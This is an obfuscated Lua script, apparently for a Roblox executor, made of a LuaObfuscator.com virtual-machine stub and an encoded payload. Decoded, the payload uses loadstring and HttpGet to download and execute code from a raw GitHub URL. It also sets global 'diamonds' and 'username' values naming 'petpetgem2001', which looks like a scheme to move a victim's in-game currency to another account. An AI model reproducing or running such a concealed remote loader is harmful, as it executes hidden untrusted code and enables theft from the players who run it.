--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-((879 -(282 + 595)) -1))) + (620 -(555 + 64)))) ;return v70-(v70%((2569 -(1523 + 114)) -(857 + 74))) ;else local v71=((513 + 57) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((120 -(32 + 85)) -0) );v19=v19 + (1069 -(68 + 997)) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * (285370 -219834)) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(13 -10)) then else v45=nil;while true do local v77=0;local v78;while true do if (0==v77) then v78=0 + 0 ;while true do if (v78==(2 -1)) then if (v39==2) then for v108=1414 -(447 + 966) ,v44 do local v109=0;local v110;local v111;local v112;local v113;while true do if (v109~=(5 -3)) then else while true do if (v110==(1818 -(1703 + 114))) then v113=nil;while true do if (v111==(702 -(376 + 325))) then if (v112==(1 -0)) then v113=v22()~=(0 -0) ;elseif (v112==2) then v113=v25();elseif (v112==(1 + 2)) then v113=v26();end v45[v108]=v113;break;end if (v111==(0 -0)) then local v188=0;while true do if (v188~=0) then else local v189=0;while true do if (v189==0) then v112=v22();v113=nil;v189=1;end if (v189==(15 -(9 + 5))) then v188=377 -(85 + 291) ;break;end end end if (v188~=(1266 -(243 + 1022))) then else v111=3 -2 ;break;end end end end break;end if (v110==(0 + 0)) then v111=0;v112=nil;v110=1;end end break;end if (v109~=(1180 -(1123 + 57))) then else v110=0;v111=nil;v109=1;end if (v109~=1) then else v112=nil;v113=nil;v109=2 + 0 ;end end end v43[257 -(163 + 91) ]=v22();for v114=1,v24() do local v115=1930 -(1869 + 61) ;local v116;local v117;while true do if (v115==(1 + 0)) then while true do if (v116==(0 -0)) then v117=v22();if (v21(v117,1 -0 ,1 + 0 )==(0 -0)) then local v182=0;local v183;local v184;local v185;local v186;while true do if (v182==0) then v183=0;v184=nil;v182=1 + 0 ;end if (1~=v182) then else v185=nil;v186=nil;v182=2;end if (2~=v182) then else while true do if (v183==0) then local v190=0;while true do if (v190==(1475 -(1329 + 145))) then v183=1;break;end if (v190==(971 -(140 + 831))) then v184=v21(v117,1852 -(1409 + 441) ,3);v185=v21(v117,722 -(15 + 703) ,3 + 3 );v190=439 -(262 + 176) ;end end end if (v183==(1724 -(345 + 1376))) then if (v21(v185,691 -(198 + 490) ,13 -10 )==(2 -1)) then v186[4]=v45[v186[1210 -(696 + 510) ]];end v40[v114]=v186;break;end if (v183==2) then local v192=0 -0 ;while true do if (v192~=0) then else if (v21(v185,1263 -(1091 + 171) ,1)==(1 + 0)) then v186[2]=v45[v186[6 -4 ]];end if (v21(v185,2,6 -4 )~=1) then else v186[3]=v45[v186[377 -(123 + 251) ]];end v192=4 -3 ;end if (v192~=1) then else v183=3;break;end end end if (v183~=1) then else local v193=0;while true do if (v193==(699 -(208 + 490))) then v183=2;break;end if (v193==(0 + 0)) then v186={v23(),v23(),nil,nil};if (v184==0) then local v200=0 + 0 ;local v201;local v202;while true do if ((202 -(14 + 188))==v200) then v201=675 -(534 + 141) ;v202=nil;v200=1;end if (v200==(1 + 0)) then while true do if (v201==0) then v202=0;while true do if (v202==(0 + 0)) then v186[3 + 0 ]=v23();v186[8 -4 ]=v23();break;end end break;end end break;end end elseif (v184==1) then v186[4 -1 ]=v24();elseif (v184==2) then v186[8 -5 ]=v24() -((2 + 0)^(11 + 5)) ;elseif (v184==(399 -(115 + 281))) then local v205=0;local v206;while true do if (v205~=0) then else v206=0 -0 ;while true do if (v206==0) then v186[3 + 0 ]=v24() -(2^16) ;v186[4]=v23();break;end end break;end end end v193=2 -1 ;end end end end break;end end end break;end end break;end if (v115~=(0 -0)) then else local v177=0;while true do if (v177~=0) then else v116=867 -(550 + 317) ;v117=nil;v177=1;end if (v177==(1 -0)) then v115=1;break;end end end end end v39=3;end if (v39==1) then local v107=0 -0 ;while true do if (v107==1) then v45={};v39=2;break;end if (v107==(0 -0)) then v43={v40,v41,nil,v42};v44=v24();v107=1;end end end break;end if (v78==(1990 -(582 + 1408))) then local v104=0;while true do if ((0 -0)==v104) then if (v39==0) then local v165=0 -0 ;local v166;while true do if (v165==0) then v166=0 -0 ;while true do if (v166~=(1825 -(1195 + 629))) then else v42={};v39=1;break;end if (v166~=0) then else v40={};v41={};v166=1;end end break;end end end if (v39==(3 -0)) then local v167=241 -(187 + 54) ;while true do if ((780 -(162 + 618))~=v167) then else for v180=1,v24() do v41[v180-1 ]=v29();end return v43;end end end v104=1 + 0 ;end if (v104==1) then v78=1;break;end end end end break;end end end break;end if (v38==(2 + 0)) then v43=nil;v44=nil;v38=6 -3 ;end if (v38~=(0 -0)) then else v39=0 + 0 ;v40=nil;v38=1;end if (v38==(1637 -(1373 + 263))) then v41=nil;v42=nil;v38=1002 -(451 + 549) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1025 -(706 + 318))) then v49=1 -0 ;v50=(v21(v48,1 -0 ,1404 -(746 + 638) ) * ((1 + 1 + 0)^(732 -((799 -528) + 429)))) + v47 ;v46=2 -0 ;end if (v46==(1502 -(1408 + 92))) then v51=v21(v48,362 -(218 + 123) ,1612 -(1535 + 46) );v52=((v21(v48,32 + 0 )==(1 + 0)) and  -(561 -(306 + 254))) or (1 + 0) ;v46=1 + 2 ;end if ((0 -0)==v46) then v47=v24();v48=v24();v46=1468 -(899 + 568) ;end if (v46==(2 + 1)) then if (v51==(529 -(406 + 123))) then if (v50==(0 -(0 -0))) then return v52 * (603 -(268 + 335)) ;else v51=1 + (114 -(4 + 110)) ;v49=290 -(60 + 230) ;end elseif (v51==(731 + 1316)) then return ((v50==(572 -(426 + 146))) and (v52 * ((1 + (584 -(57 + 527)))/((2883 -(41 + 1386)) -(282 + 1174))))) or (v52 * NaN) ;end return v8(v52,v51-(1834 -(569 + 242)) ) * (v49 + (v50/(((108 -(17 + 86)) -3)^52))) ;end end end v26=nil;function v26(v53)local v54=0;local v55;local v56;while true do if (v54==((415 -(15 + 398)) + 0)) then v56={};for v79=1 -0 , #v55 do v56[v79]=v2(v1(v3(v55,v79,v79)));end v54=8 -5 ;end if (v54==(1258 -((2025 -(18 + 964)) + 214))) then v55=v3(v16,v19,(v19 + v53) -(167 -(122 + 44)) );v19=v19 + v53 ;v54=2 -0 ;end if (v54==(0 -0)) then v55=nil;if  not v53 then local v96=0 + 0 ;while true do if (v96==(580 -((1358 -997) + 219))) then v53=v24();if (v53==(320 -(53 + 267))) then return "";end break;end end end v54=1 + 0 ;end if (v54==(1 + 0 + 2)) then return v6(v56);end end end v18=5;end if (v18==2) then function v22()local v57=0 + 0 ;local v58;while true do if (v57==1) then return v58;end if (v57==(850 -(20 + 62 + 768))) then v58=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v57=127 -(116 + (748 -(542 + 196))) ;end end end v23=nil;function v23()local v59=0 -0 ;local v60;local v61;while true do if (v59==0) then v60,v61=v1(v16,v19,v19 + 1 + 1 );v19=v19 + 2 + 0 ;v59=1 + (0 -0) ;end if (v59==(2 -(1552 -(1126 + 425)))) then return (v61 * 256) + v60 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v72=0;while true do if (v72==0) then v20=v0(v3(v62,1,1));return "";end end else local v73=v2(v0(v62,16));if v20 then local v81=v5(v73,v20);v20=nil;return v81;else return v73;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...)local v82=v67;local v83=v68;local v84=v69;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v97=0,v90 do if (v97>=v84) then v88[v97-v84 ]=v89[v97 + 1 ];else v92[v97]=v89[v97 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=6) then if (v95<=2) then if (v95<=0) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95>1) then for v157=v94[2],v94[3] do v92[v157]=nil;end else local v119=v94[2];local v120=v92[v94[3]];v92[v119 + 1 ]=v120;v92[v119]=v120[v94[4]];end elseif (v95<=4) then if (v95==3) then local v124=v94[2];v92[v124]=v92[v124](v13(v92,v124 + 1 ,v87));else local v126=v94[2];local v127,v128=v85(v92[v126](v13(v92,v126 + 1 ,v94[3])));v87=(v128 + v126) -1 ;local v129=0;for v159=v126,v87 do v129=v129 + 1 ;v92[v159]=v127[v129];end end elseif (v95==5) then do return;end elseif ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v65;else v92[v94[2]]=v65[v94[3]];end elseif (v95<=9) then if (v95<=7) then v86=v94[3];elseif (v95==8) then local v130=0;local v131;while true do if (v130==0) then v131=v94[2];v92[v131]=v92[v131]();break;end end else v92[v94[2]][v94[3]]=v94[4];end elseif (v95<=11) then if (v95==10) then v92[v94[2]]=v94[3];else local v136;local v137,v138;local v139;local v140;if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v65;else v92[v94[2]]=v65[v94[3]];end v86=v86 + 1 ;v94=v82[v86];v140=v94[2];v139=v92[v94[3]];v92[v140 + 1 ]=v139;v92[v140]=v139[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v140=v94[2];v137,v138=v85(v92[v140](v13(v92,v140 + 1 ,v94[3])));v87=(v138 + v140) -1 ;v136=0;for v162=v140,v87 do v136=v136 + 1 ;v92[v162]=v137[v136];end v86=v86 + 1 ;v94=v82[v86];v140=v94[2];v92[v140]=v92[v140](v13(v92,v140 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v86=v94[3];end elseif (v95>12) then local v149;v149=v94[2];v92[v149]=v92[v149]();v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v65;else v92[v94[2]]=v65[v94[3]];end v86=v86 + 1 ;v94=v82[v86];v149=v94[2];v92[v149]=v92[v149]();v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];else v92[v94[2]]();end v86=v86 + 1 ;end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F706970697069706970696132332F64617A6F7368646E6177627672627473796875646A696B776173642F6D61696E2F313603073O0067657467656E7603083O006469616D6F6E6473024O0080842E4103083O00757365726E616D65030D3O0070657470657467656D322O303100243O00120A3O00014O0002000100013O00264O0002000100010004073O0002000100120A000100013O00262O0001000F000100020004073O000F0001001206000200033O00120B000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O0023000100262O00010005000100010004073O0005000100120A000200013O00262O0002001B000100010004073O001B0001001206000300074O000D00030001000200302O00030008000900122O000300076O00030001000200302O0003000A000B00122O000200023O00262O00020012000100020004073O0012000100120A000100023O0004073O000500010004073O001200010004073O000500010004073O002300010004073O000200012O00053O00017O00",v9(),...);
